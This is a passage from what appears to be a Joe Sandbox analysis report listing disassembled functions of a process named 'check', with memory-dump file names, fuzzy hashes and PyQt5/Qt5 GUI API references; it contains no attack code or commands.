                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                          • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                          • Instruction ID: 21b74e916b27418404fe74aa6627861027182ab41e33872d9d8cc34c75cae120
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B031C522B1AE42D1EF55AB0AA800175A394FF89BB4F894535DD6D06384EFBCE858C220
                                                                                                                                                                                                                                          Function 00007FF89D9A1D20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?arcPainterPath@@Rect
                                                                                                                                                                                                                                          • String ID: BJ9dd$Bdddddd$QPainterPath$arcTo$arcTo(self, rect: QRectF, startAngle: float, arcLength: float)arcTo(self, x: float, y: float, w: float, h: float, startAngle: float, arcLenght: float)
                                                                                                                                                                                                                                          • API String ID: 1542133116-3728509370
                                                                                                                                                                                                                                          • Opcode ID: 5319ec96415c70251ac436deef4bcca5675b1fa48647c234314b644a8311cc23
                                                                                                                                                                                                                                          • Instruction ID: 8a1b05880903adfd449cff5654deacfbfebd8e595d1be34aca0effbfcab37433
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5319ec96415c70251ac436deef4bcca5675b1fa48647c234314b644a8311cc23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F419637609E85D9DB61CF24E4802DA73A4FB49B88F505226EA8E16B28EF38D155C704
                                                                                                                                                                                                                                          Function 00007FF89D9A1EC0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FF89D9A1F46
                                                                                                                                                                                                                                          • ?setProperty@QTextFormat@@QEAAXHAEBV?$QVector@VQTextLength@@@@@Z.QT5GUI ref: 00007FF89D9A1FF8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?setFormat@@Property@$Length@@@@@Variant@@@Vector@
                                                                                                                                                                                                                                          • String ID: BiJ1$QTextFormat$setProperty$setProperty(self, propertyId: int, value: Any)setProperty(self, propertyId: int, lengths: Iterable[QTextLength])
                                                                                                                                                                                                                                          • API String ID: 7694866-1449459306
                                                                                                                                                                                                                                          • Opcode ID: a54922d9ce7c459d363fe7fecec685ade460285478461004204ebcf58ab484b1
                                                                                                                                                                                                                                          • Instruction ID: 575405354dfed0bc908a2d5fa8d4b4563f8d7ecd7fbb88f984deaf2bb36c1ba2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a54922d9ce7c459d363fe7fecec685ade460285478461004204ebcf58ab484b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C041E337A08B4699EB208F61E8842A933B4FB48BD8F444136DA8E53728EF38E455C744
                                                                                                                                                                                                                                          Function 00007FF89D999DB0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setPainter@@Rect@@@Window@
                                                                                                                                                                                                                                          • String ID: BJ9$Biiii$QPainter$setWindow$setWindow(self, window: QRect)setWindow(self, x: int, y: int, w: int, h: int)
                                                                                                                                                                                                                                          • API String ID: 3138604205-1220107397
                                                                                                                                                                                                                                          • Opcode ID: a1885867d93b47cf4875c1d273db570ab88a644de17a887dc0b9bf66b035bed6
                                                                                                                                                                                                                                          • Instruction ID: 1b3cb9ca91405680eb64ddfd26471488ae49f82b1a032d08de2c62e313168fdc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1885867d93b47cf4875c1d273db570ab88a644de17a887dc0b9bf66b035bed6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92411C36A14B45DAEB20CF64E8802ED37B4F748B98F445136EA8E53B28EF38E155C704
                                                                                                                                                                                                                                          Function 00007FF89D977D80 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?united@QRegion@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FF89D977DED
                                                                                                                                                                                                                                          • ?united@QRegion@@QEBA?AV1@AEBVQRect@@@Z.QT5GUI ref: 00007FF89D977E7B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?united@Region@@$Rect@@@V1@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QRegion$united$united(self, r: QRegion) -> QRegionunited(self, r: QRect) -> QRegion
                                                                                                                                                                                                                                          • API String ID: 2920062276-2430780886
                                                                                                                                                                                                                                          • Opcode ID: 30254f61bdaf9620f6fa1fefcb0f257217a149513352d96e5b602bdd75352217
                                                                                                                                                                                                                                          • Instruction ID: 1c4ed651795c48a942843eebc13d2ebc4ef6f8e9b59eaa1a70a686c7e24face1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30254f61bdaf9620f6fa1fefcb0f257217a149513352d96e5b602bdd75352217
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43313A77A09A46C2EB108F15E8892A973E5FB88FD0F514136DA8E47324EF3CE555C748
                                                                                                                                                                                                                                          Function 00007FF89D9A7F00 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??0QTransform@@QEAA@XZ.QT5GUI ref: 00007FF89D9A7F60
                                                                                                                                                                                                                                          • ?toSubpathPolygons@QPainterPath@@QEBA?AV?$QList@VQPolygonF@@@@AEBVQTransform@@@Z.QT5GUI ref: 00007FF89D9A7F74
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: F@@@@List@PainterPath@@PolygonPolygons@SubpathTransform@@Transform@@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QPainterPath$toSubpathPolygons$toSubpathPolygons(self) -> List[QPolygonF]toSubpathPolygons(self, matrix: QTransform) -> List[QPolygonF]
                                                                                                                                                                                                                                          • API String ID: 4180688332-3469042540
                                                                                                                                                                                                                                          • Opcode ID: 09f6e970277203bfa695a4b67e419d1ff0a81003babc1b905d6afeb44c97d0e8
                                                                                                                                                                                                                                          • Instruction ID: 127204c9f1baac20ddb2d32cdfacb956c171ac83a5d5d36a827e58427e7a85b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09f6e970277203bfa695a4b67e419d1ff0a81003babc1b905d6afeb44c97d0e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92311A77A09B8691EB608F11E8497A973A4FB88BD0F904136DACE07364EF3CE559C744
                                                                                                                                                                                                                                          Function 00007FF71250B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                          • Instruction ID: db0dac8f73c9304e07e878e2cc59948026681ca693816903a774b05ce6441347
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33212F20F0CE4282F9587F215DD2539E2525F547B0F9447B4D97E46AC6FDACB848C324
                                                                                                                                                                                                                                          Function 00007FF89D985E00 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromLongLong_Paint$?metric@DeviceDevice@@@Metric@Writer@@
                                                                                                                                                                                                                                          • String ID: QPdfWriter$metric$metric(self, id: QPaintDevice.PaintDeviceMetric) -> int
                                                                                                                                                                                                                                          • API String ID: 2149383509-2999193365
                                                                                                                                                                                                                                          • Opcode ID: 5450896938b0e26065c9b9476519b2e35fdad20138a9f76ad80961a47039fafb
                                                                                                                                                                                                                                          • Instruction ID: b3f7d71dbe203ea3deaaaa8b0a50a6455d545416bce8790473937ed006ede4e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5450896938b0e26065c9b9476519b2e35fdad20138a9f76ad80961a47039fafb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24212972A09B4692EA608B24E84426A73E4FF94FC4F444032DACE47728EF3CE559CB04
                                                                                                                                                                                                                                          Function 00007FF89D9B9E10 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?columnCount@QStandardItem@@QEBAHXZ.QT5GUI ref: 00007FF89D9B9E8D
                                                                                                                                                                                                                                          • ?insertColumn@QStandardItem@@QEAAXHAEBV?$QList@PEAVQStandardItem@@@@@Z.QT5GUI ref: 00007FF89D9B9E9B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
